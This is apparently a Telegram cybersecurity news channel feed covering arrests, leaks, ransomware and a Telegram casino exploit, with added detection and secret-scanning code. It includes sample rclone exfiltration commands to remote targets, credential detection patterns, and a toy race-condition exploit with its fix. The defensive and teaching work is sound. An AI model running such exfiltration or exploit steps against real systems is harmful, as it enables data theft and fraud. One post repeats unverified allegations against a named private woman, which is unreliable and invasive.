Arch
2.11K subscribers
20 photos
6 links
🗞 Stay in the loop with nonstop crucial information about cybersecurity and privacy.

Purely unbiased & constantly updated feed.

📩 https://shenyun2024.top/t.me/arch?direct
JUST IN: Apple and Google have pushed out a beta of E2EE (end-to-end encrypted) RCS messaging.

On 11 May, Apple and Google released updates to their default messaging apps that add end-to-end encrypted RCS (Rich Communication Services) chats between iPhone and Android users.

The update applies to iPhone users running the latest iOS (26.5) and Android users running the latest version of Google Messages. Both parties also have to be on a carrier that supports the service.

When those requirements are met, encryption is enabled by default and enforced on every new chat. A chat in which either side does not meet them is not end-to-end encrypted.

@arch
JUST IN: Suspected Dream Market admin arrested in Germany faces U.S. charges

49-year-old Owe Martin Andresen faces up to 20 years in prison in the U.S.; he was arrested in Germany on separate charges. Dream Market operated from 2013 to 2019 and facilitated the sale of massive quantities of illegal drugs before shutting down.

Andresen allegedly ran the marketplace under the handle "Speedstepper". Prosecutors say he accessed dormant cryptocurrency wallets in late 2022 and laundered over $2 million between August 2023 and April 2025, including buying $1.7 million in gold bars that were shipped to his home in Germany.

German authorities raided his residence on May 7, 2026, and recovered the gold bars, $23,000 in cash, and evidence of $1.2 million in suspected Dream Market proceeds.

@arch
JUST IN: Interpol dismantles MENA cybercrime ring in Operation Ramz targeting phishing and malware

In a public statement, Interpol described the operation, carried out across the MENA (Middle East and North Africa) region, as a success and the first of its kind. 13 countries in the region took part in the year-long investigation.

So far, 201 arrests have been made public and 382 other suspects are under investigation. Authorities seized over 8,000 pieces of evidence and 53 servers that hosted the ring's core infrastructure.

3,867 victims have been identified, and authorities are working on restitution.

@arch
JUST IN: The Netherlands launched a new campaign called "Game Over!?" to curb cybercrime

Dutch police uploaded blurred pictures of known fraudsters to social media and promised to make their identities public if they did not turn themselves in within two weeks. The operation targeted fraudsters running bank helpdesk impersonation, fake police officer and card collector schemes. The main aim was to root out banking fraud, given the large number of elderly victims involved.

The police were essentially taunting the alleged offenders, promising to plaster their identities across social media channels and on posters in the streets for everyone to see.

The authorities went through with the plan. So far, 34 alleged cybercriminals have turned themselves in, the campaign has led police to identify 40 other suspects, and six arrests have been confirmed.

Officials have also released the age profile of the suspects: the youngest is just 14 and the average age is 22.

@arch
JUST IN: Researchers found sensitive credentials belonging to CISA (US Cybersecurity Agency) stored in a public GitHub repository

GitGuardian, a firm that scans public GitHub repositories for exposed secrets, discovered sensitive CISA logins in a publicly accessible repository.

The leak is believed to have originated with a third-party contractor working for CISA and DHS (Department of Homeland Security), possibly through human error. The repository was created in November 2025 and has been fully accessible to the public ever since. Over that time, multiple commits were made to files in the repo, one of which added an automated feature meant to warn the owner about potential leaks.

The exposed data included credentials and passwords for internal infrastructure, logs, AWS tokens and other cloud keys. The AWS tokens gave access to three servers in AWS GovCloud (the AWS environment designed specifically for US government workloads).

CISA responded with a public statement saying the credentials had not been abused and that no citizen data was compromised.

CISA has since made the repository private, denying further access to potential threat actors. That alone does not resolve the exposure: anything committed while the repository was public may already have been cloned or indexed, so the leaked secrets have to be treated as compromised and rotated.

@arch
JUST IN: The Dutch FIOD (financial crime investigation service) seized 800 servers from a bulletproof hosting provider

On May 22, FIOD announced that it had carried out raids targeting the hosting provider "Stark Industries".

Stark Industries is a web hosting company already known to law enforcement for hosting criminal infrastructure and enabling cybercrime and cyberattacks. It has been linked to Russian state-sponsored campaigns, to which it provided financial resources and hosting infrastructure. Those actions led to sanctions by the United Kingdom last May, which prompted the company to move its operations to a Dutch-based entity.

Stark Industries has also partnered in the past with a Russian hacktivist group, giving it the resources needed to launch massive DDoS campaigns against major corporations.

FIOD stated that in the raids, conducted in the Netherlands at Schiphol-Rijk and Dronten, it seized 800 servers along with other devices and records. Two arrests were made: a 57-year-old suspect who led the company, and a 39-year-old who owns a company that provided internet services to Stark Industries.

@arch
JUST IN: John Daghita is appearing this morning before the Indictment Chamber of the Court of Appeal in Basse-Terre, which is set to examine an extradition request. He is suspected of having stolen $46 million in cryptocurrency from the U.S. federal government.

The magistrates have reportedly deferred their decision until May 28. John Daghita's lawyer plans to file a request for release on bail as early as next week for her client, who is still being held in Basse-Terre prison.

Do you believe that there could be an outcome where M.Daghita is out on bond?

@arch
(Other attachment regarding John Daghita, for those interested.) @arch
⚠️ JUST IN: Former call tracking executives plead guilty to enabling a global tech support scam ring

Former CEO Adam Young and former CSO Harrison Gevirtz pleaded guilty to hiding a long-running tech support fraud tied to their company, C.A. Cloud Attribution Ltd. They face up to three years in federal prison and fines of up to $250,000; sentencing is June 16.

Prosecutors say C.A. Cloud, active from 2017 to April 2022, sold phone numbers, call recordings, routing and call-tracking to customers they knew ran scams. Those customers used fake pop-up warnings, impersonated Microsoft and Apple, pressured victims to pay hundreds for bogus fixes, remotely accessed computers, and in some cases stole data and money.

Rather than report the abuse, the executives allegedly told clients to rotate large pools of phone numbers to dodge complaints and shutdowns, steered sales toward fraudulent businesses, and sometimes brokered call trades. They also ran a Tunisia call center where staff carried out similar scams.

The FBI says the pair profited from schemes that targeted the elderly and vulnerable, leaving many frightened or financially ruined. Related cases include a ring leader sentenced to seven years after taking over $6 million from about 6,500 elderly victims. The FBI also reported that Americans lost at least $2.1 billion to tech support fraud last year, based on nearly 48,000 complaints to its Internet Crime Complaint Center.

@arch
⚠️JUST IN: FBI and IC3 warn of a PhaaS stealing Microsoft 365 OAuth tokens

The FBI and IC3 published a joint PSA after Kali365, a Telegram-marketed Phishing-as-a-Service first observed in April 2026, was found automating OAuth device authorization phishing to capture Microsoft 365 access. The kit packages the full attack chain: AI-written lures, multilingual templates, dynamic device-code generation, live cookie-capture panels and affiliate access, which makes it easy for low-skill actors to run high-volume campaigns.

Why it works:
On-demand device codes and clipboard tricks remove the timing problem (a device code is only valid for a short window), raising success rates.
The full attack chain is automated.
Captured refresh tokens provide persistent, stealthy access across services without ever needing the password.

What limits it:
It requires user interaction: the victim has to enter the attacker's code on Microsoft's device login page and approve the sign-in.
The resulting account activity and security alerts are visible; token revocation and Conditional Access policies can detect or block the misuse.
Because it depends on the OAuth device flow, rate limits and device-code policies reduce its effectiveness.


@arch
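A detection pass over sign-in logs, as an added example and not code from the advisory or from Kali365: it flags device-code sign-ins, rates those from an IP the user has never used for a normal sign-in as high, and spots a single IP completing device-code sign-ins for several users, which is what a kit's polling client looks like from the tenant side. The log lines are constructed; the field names (`authenticationProtocol`, `userPrincipalName`, `ipAddress`, `appDisplayName`, `createdDateTime`) follow the Microsoft Graph sign-in schema as I remember it and should be treated as assumptions to map onto your own export.

```python
import json
from collections import defaultdict

# Constructed sign-in records (JSON lines). Field names are assumed to match the
# Microsoft Graph signIn schema; "deviceCode" marks the device authorization grant.
# IPs are RFC 5737 documentation addresses.
SAMPLE_SIGNINS = """\
{"createdDateTime": "2026-05-20T08:01:00Z", "userPrincipalName": "alice@example.org", "ipAddress": "203.0.113.5", "authenticationProtocol": "oAuth2", "appDisplayName": "Microsoft Office"}
{"createdDateTime": "2026-05-20T08:05:00Z", "userPrincipalName": "carol@example.org", "ipAddress": "203.0.113.9", "authenticationProtocol": "oAuth2", "appDisplayName": "Microsoft Teams"}
{"createdDateTime": "2026-05-20T09:12:00Z", "userPrincipalName": "alice@example.org", "ipAddress": "198.51.100.7", "authenticationProtocol": "deviceCode", "appDisplayName": "Microsoft Office"}
{"createdDateTime": "2026-05-20T09:14:00Z", "userPrincipalName": "bob@example.org", "ipAddress": "198.51.100.7", "authenticationProtocol": "deviceCode", "appDisplayName": "Microsoft Office"}
{"createdDateTime": "2026-05-20T10:00:00Z", "userPrincipalName": "carol@example.org", "ipAddress": "203.0.113.9", "authenticationProtocol": "deviceCode", "appDisplayName": "Azure CLI"}
"""


def parse_signins(text):
    """Parse JSON-lines sign-in export into dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect_device_code_abuse(signins, shared_ip_threshold=2):
    """Return (upn, ip, severity, reason) tuples for device-code sign-ins.

    Walks events in time order. Normal (non-device-code) sign-ins build each user's
    set of known IPs. A device-code sign-in from an IP the user never used before is
    high; from a familiar IP it is medium (a CLI user may legitimately do this).
    An IP that completes device-code sign-ins for several distinct users in the
    window is reported once more as a likely campaign endpoint.
    """
    events = sorted(signins, key=lambda e: e["createdDateTime"])
    known_ips = defaultdict(set)      # upn -> IPs seen on ordinary sign-ins
    per_ip_users = defaultdict(set)   # ip -> users who did device-code sign-ins from it
    findings = []
    for e in events:
        upn, ip = e["userPrincipalName"], e["ipAddress"]
        if e.get("authenticationProtocol") != "deviceCode":
            known_ips[upn].add(ip)
            continue
        per_ip_users[ip].add(upn)
        if ip in known_ips[upn]:
            findings.append((upn, ip, "medium", "device-code sign-in from a known IP"))
        else:
            findings.append((upn, ip, "high", "device-code sign-in from an IP never used by this user"))
    for ip, users in per_ip_users.items():
        if len(users) >= shared_ip_threshold:
            findings.append(("*", ip, "high", f"device-code sign-ins for {len(users)} users from one IP"))
    return findings


if __name__ == "__main__":
    for f in detect_device_code_abuse(parse_signins(SAMPLE_SIGNINS)):
        print(*f, sep=" | ")
```

Because the victim types the code into the genuine Microsoft device-login page, URL-reputation controls never see a phishing domain; the signal is in the grant type and its context. Entra Conditional Access has an authentication-flows condition that can block the device code flow outright for every identity that does not need it, which removes the attack surface instead of detecting it after the fact.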
JUST IN: Update on the credential leak involving CISA (US Cybersecurity Agency)

Although CISA said last week that it was actively securing and replacing the leaked secrets, an exposed RSA private key was still valid. The key belongs to a GitHub App with full administrative access to the entire CISA-IT GitHub organization, including all of its code repositories. A GitHub App's private key is what the app uses to sign the JWT with which it requests installation access tokens, so anyone holding the key can act as the app on every repository it is installed on.

Dylan Ayrey, founder of Truffle Security (the company behind the TruffleHog secret scanner), notified journalist Brian Krebs, who in turn notified CISA of the findings. CISA has since invalidated the leaked RSA private key, but according to Ayrey it has not yet rotated the other leaked credentials for various sensitive infrastructure. The situation is delicate because adversaries could have seen CISA's secrets, and the infrastructure they protect, months ago.

The US Congress has also weighed in, demanding answers from CISA's leadership.

@arch
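A minimal secret scanner, as an added example and not GitGuardian's or TruffleHog's code, of the kind of check that should have fired before either the contractor's repository or the GitHub App key was ever pushed: exact patterns for AWS access key IDs, GitHub tokens and PEM private-key headers, plus a generic assignment heuristic gated by a Shannon-entropy threshold so that placeholders like `changeme` do not drown the results. The sample config is constructed; the AWS values are the pair AWS publishes as documentation examples, and the PEM body is a deliberately truncated stand-in.

```python
import math
import re
from dataclasses import dataclass


@dataclass
class Finding:
    path: str
    line: int
    kind: str
    excerpt: str  # redacted; the scanner never re-emits the full secret


# Exact detectors. AWS key IDs are AKIA/ASIA + 16 uppercase alphanumerics; GitHub
# tokens carry a gh?_ prefix; PEM headers identify private keys of any kind.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36,}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |DSA |)PRIVATE KEY-----"),
}
# Heuristic: an assignment whose name smells like a credential. The captured value
# is only reported when its entropy suggests it is not a placeholder.
GENERIC_ASSIGNMENT = re.compile(
    r"(?i)\b\w*(?:password|passwd|secret|token|api[_-]?key)\w*\s*[=:]\s*[\"']?([^\s\"']{8,})")
ENTROPY_THRESHOLD = 3.0


def shannon_entropy(s: str) -> float:
    """Bits per character; 'changeme' is about 2.75, a random 18-char token above 4."""
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def redact(s: str) -> str:
    return s[:4] + "..." + s[-2:]


def scan_text(text: str, path: str = "<memory>") -> list:
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, pat in PATTERNS.items():
            for m in pat.finditer(line):
                findings.append(Finding(path, lineno, kind, redact(m.group(0))))
        m = GENERIC_ASSIGNMENT.search(line)
        if m and shannon_entropy(m.group(1)) >= ENTROPY_THRESHOLD:
            findings.append(Finding(path, lineno, "high_entropy_secret", redact(m.group(1))))
    return findings


# Constructed sample. The AWS pair is the one AWS uses in its own documentation;
# the PEM body is truncated and not a real key.
SAMPLE_CONFIG = """\
# constructed sample config
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
password = changeme
api_token = "xK9#mQ2vLp8@Rt4wZn"
-----BEGIN RSA PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQC7 (truncated, not a real key)
-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for f in scan_text(SAMPLE_CONFIG, "config.ini"):
        print(f"{f.path}:{f.line}: {f.kind} ({f.excerpt})")
```

Wire `scan_text` into a pre-commit hook over the staged diff and into CI over the whole tree. A finding only tells you that a secret was written down; the response is always to rotate it, never just to delete the line, because the commit is already in every clone.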
JUST IN: The Salvation Army's Canadian operations are being extorted by Bravox

The RaaS (Ransomware-as-a-Service) group Bravox has listed the Salvation Army's Canadian operations on its leak site.

Bravox began operating publicly in January 2026 and originates from the RAMP forum. Its primary targets are US-based organizations in healthcare and retail.

Bravox is threatening to leak 110.1 GB of data if its demands are not met. The Salvation Army has not yet issued an official public statement on the situation. Infostealer logs point to 1 compromised employee, 2 compromised users and 27 third-party employee credentials.

The Salvation Army operates in 134 countries, providing shelter, rehabilitation programs and resources to vulnerable people.

@arch
JUST IN: Infamous e-girl "Kenzie", AKA Makenna, has allegedly been raided by federal agents.

She was known to be closely associated with ransomware affiliates such as "Waifu", also known as Alexander "Connor" Riley Moucka, who was arrested in Kitchener, Ontario, on October 30, 2024, at the request of U.S. authorities. He is currently in U.S. custody facing 20 federal charges for his alleged role in massive cyberattacks, data breaches and extortion schemes, most notably the Snowflake breach.

Her device appears to have been seized on April 3, 2026 (03/04/26). She is under an ongoing investigation for receiving and spending illegal proceeds from various criminal activities, such as ransom payments and funds social-engineered from victims, and for using those funds to pay for VaaS (Violence-as-a-Service) to harm other members of the community through swatting.

The attachments above depict her search warrant, ordered by the court of Kentucky.

This post is a warning about a new approach by federal authorities: closing in on known suspects and making rather quiet arrests that never reach the media. Most of these apprehensions end with the suspect turning silent informant.

It is advised to stay away from her if you are affiliated with her in any way, shape or form.

@arch
JUST IN: FBI IC3 released an advisory on the group known as "Silent Ransom Group"

Silent Ransom Group (SRG, also tracked as Luna Moth, Chatty Spider and UNC3753) has been active since 2022, targeting finance, insurance and healthcare companies through social engineering. Its playbook usually consists of impersonating the IT helpdesk, sending phishing emails, gaining unauthorized access to systems and exporting data through legitimate remote access tools. SRG has also sent individuals in person to victim companies to gain internal access that way. Since spring 2023 the group has shifted its focus to US-based law firms.

IC3 has called SRG "Unconventional from different ransomware groups." because of its unusual approach. SRG does not rely on traditional ransomware encryption. Instead, it seeks swift access to victims' systems, exports the data and extorts the companies by threatening to leak or sell it.

Attackers call an employee and social-engineer remote access; if that fails, they send an operative to plug a device into the victim's machine, then trick the user into imaging or backing it up and use escalated privileges to exfiltrate data via WinSCP or a disguised copy of Rclone.

@arch
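A hunt over process-creation events for the exfiltration step, as an added example rather than anything from the IC3 advisory: it catches a renamed rclone binary through the `OriginalFileName` that survives a rename, backs that up with a command-line heuristic (an rclone verb, a `remote:` target and rclone-specific flags) for the case where the PE version resource has been stripped, and flags scripted WinSCP transfers. The events are constructed to resemble Sysmon Event ID 1 fields; the paths, remote names and flag combinations are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Constructed events shaped like Sysmon Event ID 1 (process creation). Sysmon writes
# "-" when OriginalFileName is absent, which is what a stripped binary looks like.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\j.doe\AppData\Local\Temp\svchost.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r'svchost.exe sync "C:\Shares\Legal" remote:legal --transfers 32 --config C:\Users\j.doe\AppData\Roaming\r.conf',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\ProgramData\update.exe", "OriginalFileName": "-",
     "CommandLine": r"update.exe copy C:\Finance mega:backup --multi-thread-streams 8 --ignore-existing",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe", "OriginalFileName": "WinSCP.exe",
     "CommandLine": r"WinSCP.exe /script=C:\Users\j.doe\up.txt /log=C:\Users\j.doe\up.log",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": r"notepad.exe C:\Users\j.doe\notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

EXFIL_TOOLS = {"rclone.exe", "winscp.exe"}
RCLONE_VERB = re.compile(r"\b(copy|sync|move|copyto|moveto|lsd|ls|mount)\b", re.I)
# "name:path" where the name is not a drive letter (C:\) or a URL scheme (http://)
RCLONE_REMOTE = re.compile(r"(?<![\w:\\/])[A-Za-z0-9_-]+:(?![\\/])")
RCLONE_FLAGS = re.compile(r"--(config|transfers|multi-thread-streams|ignore-existing|no-check-certificate)\b")
WINSCP_SCRIPT = re.compile(r"/(script|command)=", re.I)


def classify(event):
    """Return the list of reasons this process event looks like tool-based exfiltration."""
    image = PureWindowsPath(event["Image"]).name.lower()
    orig = event.get("OriginalFileName", "-").lower()
    cmd = event.get("CommandLine", "")
    reasons = []
    if orig in EXFIL_TOOLS and orig != image:
        reasons.append(f"renamed {orig} running as {image}")
    if orig == "rclone.exe" or (RCLONE_VERB.search(cmd) and RCLONE_REMOTE.search(cmd)
                                and RCLONE_FLAGS.search(cmd)):
        reasons.append("rclone-style command line (verb + remote: target + rclone flags)")
    if orig == "winscp.exe" and WINSCP_SCRIPT.search(cmd):
        reasons.append("WinSCP scripted transfer")
    return reasons


def hunt(events):
    """(Image, reasons) for every event that triggered at least one detector."""
    return [(e["Image"], classify(e)) for e in events if classify(e)]


if __name__ == "__main__":
    for image, reasons in hunt(SAMPLE_EVENTS):
        print(image, "->", "; ".join(reasons))
```

The rename check is cheap and precise but only works while the version resource is intact; the command-line heuristic is what catches a rebuilt or stripped binary, at the cost of needing tuning against legitimate backup jobs. Either way, an rclone or scripted WinSCP run from a user profile directory with a parent of explorer.exe or cmd.exe deserves a look.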
JUST IN: Threat actor Ryan Pepper allegedly tortured in Dubai detention

27-year-old threat actor Ryan Pepper, from Kent, United Kingdom, has reportedly been held in UAE custody for over 7 months without formal charges or a court appearance.

During his detention he allegedly suffered severe abuse, including repeated beatings and torture, while imprisoned in Sharjah.

According to reports, Pepper managed to smuggle handwritten notes out of prison describing violent treatment and inhumane conditions, even noting that his teeth were pulled out. His family claims they were left without information on his whereabouts for weeks after his disappearance.

Human rights campaigners are now calling on UK authorities to take stronger action, accusing the UAE of arbitrary detention practices and abuse of foreign nationals. The UK Foreign Office says it is providing consular support and has raised concerns with Emirati officials.

The case has reignited criticism surrounding the UAE’s detention system, with advocacy groups warning travelers about the risks of imprisonment and mistreatment in the country.

According to insider sources, it is alleged that other threat actors are receiving similar treatment, notably people involved in the wave of arrests in December 2025, including some names tied to the $243M Genesis creditor theft of August 2024 and other well-known threat actors from the community who caused well over eight figures in damages.

Ironically, Dubai has long been viewed online as a safe haven for fraudsters, cybercriminals and organized scam networks, owing to weak enforcement, a culture of protection for the wealthy and the difficulty foreign agencies face when pursuing suspects operating from the region. Over the past few years, countless figures tied to financial fraud, ransomware, crypto scams and social engineering operations have openly relocated there believing they were untouchable.

However, recent arrests, detentions, extraditions, and international cooperation efforts suggest that image may slowly be changing. Authorities in the UAE appear to be increasing pressure on certain criminal networks, particularly as global attention surrounding cybercrime and financial fraud continues to grow.

@arch
⚠️ We have introduced a new direct message function so that you can reach out to us with any questions, stories or tips, as well as for support on any questions you may have about our posts.

Our main aim has always been to serve our dear community with quality topics and intriguing articles. We are community oriented and want to publish news that is tailored to your interests.

The direct message link can be found by opening our channel's profile and scrolling to the bottom, where anyone can send us a direct message.

@arch
⚠️ JUST IN: Telegram casino "Unbox" exploited for approximately $130,000 via a race-condition vulnerability.

A vulnerability in the Telegram-based casino "Unbox", operated by well-known middleman @nine, was allegedly exploited to turn roughly $120 into nearly $130,000.

According to reports, the attacker automated two API requests against a mines-style game so that both arrived within the same millisecond: one acting on a round that was still in progress, and one triggering a seed reset. A seed reset reveals the previous server seed, and because the active round still depended on that seed, the attacker could compute the round's outcome from the revealed seed and finish it with effectively guaranteed winning picks. By repeating this, the attacker reportedly scaled the balance significantly.

When the attacker attempted to withdraw the funds, the account was reportedly blacklisted by the platform.

After the withdrawal was blocked, the exploiter publicly criticized the casino and suggested misconduct on its part. The individual later admitted that the funds had been obtained by exploiting a vulnerability in the platform, undermining claims that the incident constituted an exit scam.

We reached out to @nine about the exploit for comment but did not receive a response by publication time.

The incident highlights a broader issue facing many Telegram-based casinos and gambling applications. Security controls, game-state validation, concurrency protections and backend auditing are often less mature than at larger regulated gaming platforms, which makes race conditions and logic flaws particularly dangerous when real funds are involved. A seed must never be revealed while a round that depends on it is still open, and that check has to be atomic with the rotation, or two concurrent requests can still slip between the check and the update.

At the time of writing, there is no evidence that @unbox or its operator, @nine, conducted an exit scam.

@arch
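A toy reconstruction of the bug, as an added example and not Unbox's code: the server commits to a hashed server seed, derives the mine layout from an HMAC over the server seed, client seed and nonce, and has a seed-rotation endpoint that reveals the old seed. In the vulnerable configuration the rotation endpoint never checks whether a round is still open, so the attacker's second request hands back the seed the open round depends on and every safe tile can be cleared. The hardened configuration makes the check and the rotation one atomic step under the same lock. The hashing scheme, the 5x5 board with five mines and the payout multiplier are assumptions.

```python
import hashlib
import hmac
import secrets
import threading

GRID, MINES = 25, 5   # assumed 5x5 board with five mines


def mine_positions(server_seed: str, client_seed: str, nonce: int) -> set:
    """Assumed provably-fair derivation: HMAC-SHA256 keyed with the secret server seed
    drives a Fisher-Yates shuffle; the first MINES tiles of the result are mines."""
    digest = hmac.new(server_seed.encode(), f"{client_seed}:{nonce}".encode(),
                      hashlib.sha256).digest()
    tiles = list(range(GRID))
    for i in range(GRID - 1, 0, -1):
        j = digest[i] % (i + 1)
        tiles[i], tiles[j] = tiles[j], tiles[i]
    return set(tiles[:MINES])


def verify_seed(revealed: str, commitment: str) -> bool:
    """Player-side check: a revealed server seed must hash to the published commitment."""
    return hashlib.sha256(revealed.encode()).hexdigest() == commitment


class MinesCasino:
    """Toy backend. enforce_round_state=False reproduces the reported flaw: rotating
    the seed reveals it even while a round that depends on it is still open."""

    def __init__(self, enforce_round_state: bool):
        self.enforce_round_state = enforce_round_state
        self.server_seed = secrets.token_hex(16)
        self.nonce = 0
        self.round = None
        self.balance = 0.0
        self.lock = threading.Lock()   # every request is one atomic section

    def seed_hash(self) -> str:
        return hashlib.sha256(self.server_seed.encode()).hexdigest()

    def start_round(self, client_seed: str, bet: float) -> int:
        with self.lock:
            if self.round is not None:
                raise RuntimeError("round already active")
            self.balance -= bet
            self.round = {"seed": self.server_seed, "client": client_seed,
                          "nonce": self.nonce, "bet": bet, "safe_picks": 0}
            self.nonce += 1
            return self.round["nonce"]

    def rotate_seed(self) -> str:
        """Reveal the current server seed and install a fresh one."""
        with self.lock:
            # The fix: the open-round check lives inside the same lock as the swap.
            if self.enforce_round_state and self.round is not None:
                raise RuntimeError("cannot rotate seed while a round is active")
            old, self.server_seed = self.server_seed, secrets.token_hex(16)
            return old

    def pick(self, tile: int) -> str:
        with self.lock:
            r = self.round
            if r is None:
                raise RuntimeError("no active round")
            if tile in mine_positions(r["seed"], r["client"], r["nonce"]):
                self.round = None
                return "boom"
            r["safe_picks"] += 1
            return "safe"

    def cash_out(self) -> float:
        with self.lock:
            r = self.round
            if r is None:
                raise RuntimeError("no active round")
            payout = r["bet"] * (1 + 0.25 * r["safe_picks"])   # assumed toy multiplier
            self.balance += payout
            self.round = None
            return payout


def attacker_turn(casino: MinesCasino, bet: float = 1.0):
    """Request 1 opens a round; request 2 asks for a seed rotation. If the server
    answers with the old seed, the attacker derives the layout and clears every safe
    tile. Returns the payout, or None when the hardened server refuses."""
    client_seed = "attacker"
    nonce = casino.start_round(client_seed, bet)
    try:
        revealed = casino.rotate_seed()
    except RuntimeError:
        return None
    mines = mine_positions(revealed, client_seed, nonce)
    for tile in range(GRID):
        if tile not in mines:
            assert casino.pick(tile) == "safe"
    return casino.cash_out()


if __name__ == "__main__":
    for hardened in (False, True):
        c = MinesCasino(enforce_round_state=hardened)
        print("hardened" if hardened else "vulnerable", attacker_turn(c), c.balance)
```

The ordering is what matters, not the millisecond: any design in which the seed can be revealed while a round depending on it is unsettled is exploitable, and the check must sit inside the same lock or database transaction as the rotation, otherwise two concurrent requests can interleave between the check and the update. An equivalent fix is to have rotation atomically settle or void any open round before revealing the seed.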
⚠️JUST IN: Nemesis Market vendor Darren Hughes sentenced to 26+ years for trafficking

39-year-old Darren Hughes, of San Jose, California, has been sentenced to more than 26 years in federal prison after a November 2025 conviction for trafficking fentanyl and methamphetamine through Nemesis Market.

Hughes operated a Nemesis Market storefront that offered free meth samples; after an undercover agent received a free sample, Hughes sold meth and fentanyl pills to the agent on five separate occasions in 2023. He was arrested on June 28, 2023, after arranging another sale; officers found ~672 grams of methamphetamine and a loaded 9mm “ghost gun” in his vehicle.

Prosecutors say Hughes exploited the dark web to distribute drugs and that law enforcement investigations into Nemesis Market began in October 2022 and culminated in the market’s shutdown in March 2024. At its peak Nemesis hosted hundreds of thousands of user accounts, processed hundreds of thousands of orders (including thousands for opioids and tens of thousands for stimulants), and was dismantled by coordinated German–U.S. actions that seized infrastructure and assets.

Officials from the U.S. Attorney’s Office and IRS-CI emphasized that dark web marketplaces are not beyond law enforcement’s reach and highlighted the ongoing multinational efforts that led to Nemesis Market’s takedown and related prosecutions.

@arch
⚠️JUST IN: Threat actor Ryan Pepper speaks from UAE detention

28-year-old Ryan Pepper from Kent, UK, has now been held in a Sharjah detention centre for over 7 months without charges. He still does not know what crime he is accused of.

In a secretly recorded voice note, Pepper revealed that he and other detainees were forced to sign legal documents in Arabic under threat of having their hands broken. None were given translations.

Pepper and 14 others on his case, including 7 British nationals, all in their twenties, allege they were blindfolded, stripped, beaten, sexually assaulted and psychologically tortured in small rooms where the CCTV was turned off. Guards allegedly recorded the assaults and shared them on WhatsApp and Snapchat. Pepper was hospitalized at least once.

Conditions include 30–40 minutes outside his cell per day, months without daylight, constant bright lights preventing sleep, and no drinking water. Detainees believe the food is drugged and only eat commissary items purchased with family money.

British Embassy officials visited Pepper and witnessed his cracked teeth and head bandage, yet the family has been told an investigation could take over a year. His two children, aged 1 and 3, haven’t seen him in over six months.

Radha Stirling, CEO of Detained in Dubai, confirmed a dramatic spike in British citizens reporting torture and arbitrary detention in the UAE, calling Pepper’s case “not an isolated incident.”

@arch